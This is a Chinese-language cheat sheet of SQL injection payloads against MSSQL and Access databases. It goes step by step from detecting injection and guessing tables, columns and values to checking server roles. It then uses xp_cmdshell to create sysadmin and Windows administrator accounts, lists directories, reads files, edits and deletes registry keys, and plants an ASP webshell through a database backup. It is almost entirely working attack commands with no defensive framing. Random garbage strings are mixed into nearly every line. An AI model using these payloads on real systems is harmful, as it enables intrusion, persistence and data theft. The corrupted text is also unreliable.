1.判断是否有注入;and 1=1 ;and 1=2 "E|r 3cN
2.初步判断是否是mssql ;and user>0 AOx3QgC^NO
Owpg]p yVD
3.注入参数是字符'and [查询条件] and ''=' NZC='3Uz
N3yB1_
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 1|WpKaMoq
t-m9n*\j1
5.判断数据库系统 kad;Wa#h
Wj j2J8B
;and (select count(*) from sysobjects)>0 mssql sp
Q4m
z2Y_L8u2
;and (select count(*) from msysobjects)>0 access W+f&%En
-V
u/TT0
(d'j'U:C
dHq )vs,L
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e9`uD|KAS|
wvmg)4,
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 3hXmYz(
b;J0'o^G|
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 hHc^ZA
RQpIBsj
9.(1)猜字段的ascii值(access) f >)Tq'
QPe9s[Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 uH&,%k9GVK
{eswe
(2)猜字段的ascii值(mssql) !P~ PF:W~|
|pH*
CCA
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'y6!%k*
=,d* {m~A
10.测试权限结构(mssql) #x5 N{8
w38c
|J<pLz
~1=.?Ho
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [+'BQ
g|._n
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- fATA%eA8;
C^,4`OI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- &V#z kW
6A$_&?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2z.8rNwT
6L8tz8
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Rnj Jg?I=
5]H))}9>d
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -4vHK!l
(K*/Vp
;and 1=(select IS_MEMBER('db_owner'));-- (~G5t(+
Gf
H*,1x
3|K=%jr[
-7k|6"EwM
11.添加mssql和系统的帐户 5BU%%fBJ.
Ig02M_
;exec master.dbo.sp_addlogin username;-- \,l.p_<
;exec master.dbo.sp_password null,username,password;-- hY.e [+
x&R9${e%
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h0F0d^W.
P /c
Q1
;exec master.dbo.xp_cmdshell 'net user username password Zk/' \(5
'9-axIj70
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- OS4]Y
`;5VH ]V
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "%oH@
=
_K0izKTA.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- HPtTv}l
V8sH{R-
GUu\dl9WA'
~?AC:
12.(1)遍历目录 O t *K+^I
`26V`%bPkr
;create table dirs(paths varchar(100), id int) 0'yG1qG
S,*{q(
;insert dirs exec master.dbo.xp_dirtree 'c:\' NK7H,V}T
c<=`<!FS[
;and (select top 1 paths from dirs)>0 5)d,G9
sf |oNOz
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) YN,y0t/cQ
vzY'+9q1.
JrCf,?L^
mL:m;>JJ n
(2)遍历目录 DKy>]Hca
c*x J=Gz6d
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- QKp+;$SE'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +cz"`T`X 2
7tpAZ<{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 MxO
W)$f
3>-[B`dD(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 @Jb@L
Rk($lW)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zmrQf/y{R
O.@g/05C
,wtFs!8
M82.khm~jM
13.mssql中的存储过程 8hTR*e!+
L6|Hgrj -u
xp_regenumvalues 注册表根键, 子键 =
n+q_.A
81GQijq
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 >I$B=
dT5J-70Fl
xp_regread 根键,子键,键值名 On#;)35M
b#D9eJhS
;exec xp_regread 2[jL^XMM
Ik`O.Q.}
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 F(Lb8\to\M
o3Mf:;2c C
xp_regwrite 根键,子键, 值名, 值类型, 值 BZovtm3E
b8rp8'M)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 W|)GV0YM
oN *SRaAp
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 kQ@gO[hS
9@:BK;Fi
xp_regdeletevalue 根键,子键,值名 QCeMKjCmY
H@K#|A=a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 y,MPGW_
=yl4zQmg$
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 v1LKU
EkN_8(w
OENzG~
R=!kbBK>\
14.mssql的backup创建webshell Q;4}gUmI$
L +L9Y}
use model ;tJWOm
T"n{WmVQ
create table cmd(str image); -glugVq
JZ `>|<W
insert into cmd(str) values (''); 8O,?|c=>
^'m\D;
backup database model to disk='c:\l.asp'; *6:v}#b[
^#]c0
xC<=~(
qs=Gj?GwGQ
15.mssql内置函数 4HM;K_G%{
+T9Q_e*
;and (select @@version)>0 获得Windows的版本号 eymi2-a<
? m&IF<b
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =v.{JV#
he"L*p*H
;and (select user_name())>0 爆当前系统的连接用户 O/mR9[}
F "!agc2!
;and (select db_name())>0 得到当前连接的数据库 \Ke8W,)ew
1Fv8T'
TYYp"wx
2b5 #PcKa
16.简洁的webshell +a|"{
59.$ULQVMY
use model X4a^mw\"
}i(qt&U;
create table cmd(str image); !{;[xXK4M
! 0^;;'
insert into cmd(str) values (''); ]fj- `==
^V[/(Lq
backup database model to disk='g:\wwwtest\l.asp';